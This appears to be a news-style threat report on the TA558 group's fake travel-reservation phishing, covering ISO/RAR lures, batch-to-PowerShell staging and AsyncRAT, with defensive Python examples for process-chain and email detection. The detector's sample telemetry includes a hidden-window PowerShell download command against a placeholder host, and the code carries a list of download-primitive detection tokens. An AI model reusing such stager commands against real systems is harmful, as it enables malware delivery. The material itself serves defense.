Fake Travel Reservations Emerge as a New Front in Cyberattacks Targeting a Recovering Industry

The global travel and hospitality sectors, still navigating the choppy waters of post-pandemic recovery, are facing a new and insidious threat: sophisticated phishing campaigns leveraging fake travel reservations. This resurgence of malicious activity is spearheaded by a seasoned threat group, identified as TA558, which has intensified its operations to capitalize on the renewed surge in bookings and travel plans. Security researchers are issuing stark warnings, highlighting the evolving tactics of these cybercriminals who are transforming seemingly innocuous reservation confirmations into potent vectors for malware delivery.
The current wave of attacks, meticulously documented by cybersecurity firm Proofpoint, marks a significant evolution in TA558’s modus operandi. While the group has historically targeted the travel and hospitality industries since at least 2018, their latest campaigns exhibit a notable shift in delivery mechanisms. Moving away from their earlier reliance on malicious document attachments, TA558 is now frequently employing RAR and ISO file attachments, embedded within deceptive reservation emails. These container file formats, when opened by unsuspecting recipients, can unpack a payload of various malware strains, including potent Remote Access Trojans (RATs).
This strategic pivot, according to Proofpoint’s analysis, is likely a direct response to enhanced security measures implemented by major software providers. Microsoft’s announcements in late 2021 and early 2022 regarding the default disabling of macros in Office products (VBA and XL4) forced threat actors to seek alternative infiltration methods. TA558’s adoption of ISO and RAR files circumvents these macro-based defenses, presenting a fresh challenge for organizations and individuals alike.
The Evolving Tactics of TA558
TA558’s operational history paints a picture of a persistent and adaptable adversary. For years, the group has primarily focused its attention on organizations within the travel, hospitality, and related industries, with a particular emphasis on those located in Latin America, and occasionally extending its reach to North America and Western Europe. Their primary objective has consistently been financial gain, achieved through the theft of sensitive data and subsequent monetization.
The group’s initial attacks, dating back to 2018, often exploited vulnerabilities in Microsoft Word’s Equation Editor, such as CVE-2017-11882, a critical remote code execution bug. These exploits were designed to download and install RATs, with Loda and Revenge RAT being commonly observed payloads. These RATs provide attackers with the ability to remotely control infected machines, enabling them to conduct reconnaissance, exfiltrate data, and deploy further malicious software.
By 2019, TA558 demonstrated its adaptability by expanding its arsenal. This included the deployment of malicious macro-laced PowerPoint attachments and the exploitation of template injection techniques against Office documents. Notably, the group also broadened its targeting demographics, initiating the use of English-language phishing lures for the first time, indicating a strategic expansion of their potential victim pool.
The early months of 2020 proved to be TA558’s most prolific period, with the group launching an astonishing 25 malicious campaigns in January alone. During this surge, they predominantly utilized macro-laden Office documents or targeted known vulnerabilities within Office applications. This period underscores the group’s capacity for rapid and large-scale offensive operations.
The Current Campaign: A Shift in Delivery
The recent surge in TA558’s activity, particularly in 2022, has seen a dramatic increase in the use of URLs as a delivery mechanism, often leading to container files like ISOs or RARs. Proofpoint documented TA558 conducting 27 campaigns utilizing URLs in 2022, a significant jump from a mere five campaigns in total between 2018 and 2021.
The mechanics of infection in these new campaigns are designed to be deceptively simple. Victims receive an email that appears to be a legitimate travel reservation confirmation. However, embedded within this email are links that, upon closer inspection, lead to malicious files. In many instances, these links direct users to an ISO file, which is essentially a disc image file. When a user opens, or "mounts", this ISO file, Windows presents it as a virtual disc drive and exposes its contents. Among these contents is often a batch file (.BAT), a simple script run by the Windows command processor.
Upon execution, the batch file acts as a helper script, initiating a PowerShell process. PowerShell, a powerful command-line shell and scripting language built into Windows, is then leveraged to download and execute a more sophisticated follow-on payload. In the context of TA558’s recent activities, this payload has frequently been identified as AsyncRAT, a potent RAT that offers extensive remote control capabilities.
"The reservation link… led to an ISO file and an embedded batch file. The execution of the BAT file led to a PowerShell helper script that downloaded a follow-on payload, AsyncRAT," the researchers detailed in their report. This multi-stage approach allows the attackers to evade initial detection and establish a persistent presence on the compromised system.
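The ISO, batch file and PowerShell stages described above leave a recognisable parent/child process pattern on the endpoint. The following is an added example, not code from Proofpoint's report, showing how a defender could flag that chain in process-creation telemetry; the event records are constructed and simplified (field names pid, ppid, image, cmdline are an assumption, loosely modelled on Sysmon Event ID 1), and the mounted-image drive letter E: is part of the constructed scenario.

```python
"""Flag the .BAT -> PowerShell download chain in process-creation events.

Added example, not from the original article. Event records are constructed
stand-ins for process-creation telemetry; field names are assumptions.
"""
import re
from typing import Dict, List

# Download primitives commonly seen in PowerShell stagers (detection tokens, not exhaustive).
DOWNLOAD_TOKENS = re.compile(
    r"(?i)(Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Net\.WebClient|Start-BitsTransfer)"
)
BAT_RE = re.compile(r"(?i)\.bat\b")


def ancestors(ev: Dict, by_pid: Dict[int, Dict]) -> List[Dict]:
    """Walk ppid links towards the root; guards against cycles in malformed data."""
    chain, seen = [], set()
    cur = by_pid.get(ev["ppid"])
    while cur and cur["pid"] not in seen:
        seen.add(cur["pid"])
        chain.append(cur)
        cur = by_pid.get(cur["ppid"])
    return chain


def flag_bat_powershell_download(events: List[Dict]) -> List[Dict]:
    """Return PowerShell processes that download content and run under a cmd.exe executing a .bat."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if not e["image"].lower().endswith("powershell.exe"):
            continue
        if not DOWNLOAD_TOKENS.search(e["cmdline"]):
            continue
        for parent in ancestors(e, by_pid):
            if parent["image"].lower().endswith("cmd.exe") and BAT_RE.search(parent["cmdline"]):
                hits.append({"pid": e["pid"], "bat_parent": parent["pid"], "cmdline": e["cmdline"]})
                break
    return hits


# Constructed sample telemetry; E: stands for a mounted disc image in this scenario.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "E:\Reservation_Details.bat"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -c \"(New-Object Net.WebClient).DownloadString('http://example.invalid/s2')\""},
    {"pid": 400, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -c Get-Date"},  # benign: no download token, no .bat parent
]

if __name__ == "__main__":
    for h in flag_bat_powershell_download(SAMPLE_EVENTS):
        print(f"ALERT: powershell pid {h['pid']} downloading under .bat parent pid {h['bat_parent']}")
```

In production the same logic would run over Sysmon or EDR process-creation events, and the drive-letter check for mounted images would come from the platform's own disk-mount telemetry rather than being assumed.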
Broader Implications for the Travel Industry
The implications of TA558’s persistent targeting of the travel and hospitality sector are far-reaching. For organizations within these industries, a successful breach can lead to severe financial losses, reputational damage, and significant operational disruptions. The theft of customer data, including personal identifiable information (PII) and payment card details, can result in identity theft, fraud, and a loss of customer trust.
"It's possible compromises could impact both organizations in the travel industry as well as potentially customers who have used them for vacations," stated Sherrod DeGrippo, Vice President of Threat Research and Detection Organizations at Proofpoint. This highlights the dual nature of the threat, where both businesses and their patrons are at risk.
The increased sophistication of TA558’s tactics, particularly the shift to ISO and RAR attachments, presents a challenge for traditional endpoint security solutions that may not be adequately configured to detect threats embedded within these file types. Moreover, the reliance on social engineering – crafting emails that mimic legitimate reservation confirmations – preys on the heightened anticipation and potential stress associated with travel planning.
A Chronology of TA558’s Evolution
- 2018: TA558 begins its focused targeting of the travel and hospitality sectors, primarily in Latin America. Early attacks exploit Microsoft Word vulnerabilities (e.g., CVE-2017-11882) to deliver RATs like Loda and Revenge RAT.
- 2019: The group expands its attack vectors to include macro-laced PowerPoint attachments and template injections against Office documents. They also begin using English-language phishing lures, broadening their target audience.
- Early 2020: TA558 experiences its most prolific period, launching numerous campaigns using macro-laden Office documents and exploiting known Office vulnerabilities.
- Late 2021 – Early 2022: Microsoft announces default disabling of macros in Office products.
- 2022 – Present: TA558 shifts its primary delivery mechanism to URLs, often leading to RAR and ISO file attachments containing payloads like AsyncRAT. The overall campaign tempo significantly increases.
Official Responses and Recommendations
While specific official responses from individual travel companies are not publicly detailed, the cybersecurity community is actively disseminating warnings and best practices. Security researchers strongly advise organizations within the targeted sectors to remain vigilant and implement robust security measures.
"Organizations in these and related industries should be aware of this actor’s activities and take precautions to protect themselves," DeGrippo urged. This includes:
- Enhanced Email Security: Implementing advanced email filtering solutions capable of detecting and blocking sophisticated phishing attempts, including those with malicious attachments.
- User Education and Awareness: Conducting regular security awareness training for employees, focusing on identifying phishing attempts, understanding the risks of opening unexpected attachments, and verifying the legitimacy of communications.
- Endpoint Detection and Response (EDR): Deploying EDR solutions that can monitor for malicious activity on endpoints, detect suspicious processes, and respond to threats in real-time.
- Regular Software Updates: Ensuring all operating systems, applications, and security software are kept up-to-date with the latest patches and security updates to mitigate known vulnerabilities.
- Principle of Least Privilege: Implementing strict access controls to limit the damage an attacker can inflict if they gain access to a system.
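The email-security recommendation above maps directly to the lure the article describes: a booking-themed message that delivers an ISO or RAR container by attachment or link. The following is an added example, not any vendor's product code, of a gateway-side heuristic that parses a message with Python's standard library and scores that combination; the keyword list, extension list beyond ISO and RAR, thresholds and the sample message are all constructed assumptions for illustration.

```python
"""Score reservation-themed mail that carries ISO/RAR containers by attachment or URL.

Added example, not from the original article. Keyword list, extra extensions,
score weights and the sample message are constructed assumptions.
"""
import re
from email import message_from_string
from typing import Dict, List
from urllib.parse import urlparse

CONTAINER_EXT = (".iso", ".img", ".rar", ".7z")  # ISO and RAR per the article; .img/.7z assumed
LURE_WORDS = re.compile(r"(?i)\b(reservation|booking|itinerary|confirmation)\b")
URL_RE = re.compile(r"""https?://[^\s<>"']+""")


def container_urls(text: str) -> List[str]:
    """Return URLs whose path ends in a container-file extension."""
    return [u for u in URL_RE.findall(text)
            if urlparse(u).path.lower().endswith(CONTAINER_EXT)]


def assess(raw: str) -> Dict:
    """Parse an RFC 5322 message and score lure wording plus container delivery."""
    msg = message_from_string(raw)
    subject = msg.get("Subject", "")
    attachments, body = [], []
    for part in msg.walk():
        fn = part.get_filename()
        if fn:
            attachments.append(fn)
        elif part.get_content_type() == "text/plain":
            body.append(part.get_payload(decode=True).decode(errors="replace"))
    text = "\n".join(body)
    bad_att = [a for a in attachments if a.lower().endswith(CONTAINER_EXT)]
    bad_urls = container_urls(text)
    lure = bool(LURE_WORDS.search(subject) or LURE_WORDS.search(text))
    score = (2 if lure else 0) + (3 if bad_att else 0) + (3 if bad_urls else 0)
    return {"lure": lure, "container_attachments": bad_att,
            "container_urls": bad_urls, "score": score, "quarantine": score >= 5}


# Constructed sample message; sender and host are placeholders.
SAMPLE_MAIL = """From: bookings@example.invalid
To: frontdesk@example.invalid
Subject: Reservation confirmation #48213
MIME-Version: 1.0
Content-Type: text/plain; charset=utf-8

Dear partner, please review the reservation details here:
http://example.invalid/docs/Reservation_48213.iso
"""

if __name__ == "__main__":
    print(assess(SAMPLE_MAIL))
```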
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) also frequently issues alerts and advisories regarding evolving cyber threats, encouraging businesses to adopt a proactive and layered security approach. Their guidance often emphasizes the importance of network segmentation, intrusion detection systems, and incident response planning.
Looking Ahead: A Continuous Battle
The persistent evolution of TA558 underscores the dynamic nature of the cyber threat landscape. As the travel industry continues its recovery and booking volumes rise, it will likely remain a lucrative target for financially motivated threat actors. The group’s ability to adapt its tactics in response to security advancements suggests that future campaigns may involve even more novel delivery methods and sophisticated evasion techniques.
The shift to leveraging ISO and RAR files as primary infection vectors is a clear indicator that attackers are actively seeking ways to bypass traditional security controls. This necessitates a continuous reassessment of defensive strategies and a commitment to staying ahead of emerging threats. For travelers, increased vigilance regarding unsolicited emails, especially those pertaining to bookings or reservations, is paramount. Verifying the sender’s identity and scrutinizing links before clicking can significantly reduce the risk of falling victim to these malicious schemes. The ongoing battle against cybercrime in the travel sector will require a collaborative effort between cybersecurity professionals, businesses, and individuals to ensure a safer and more secure travel experience for all.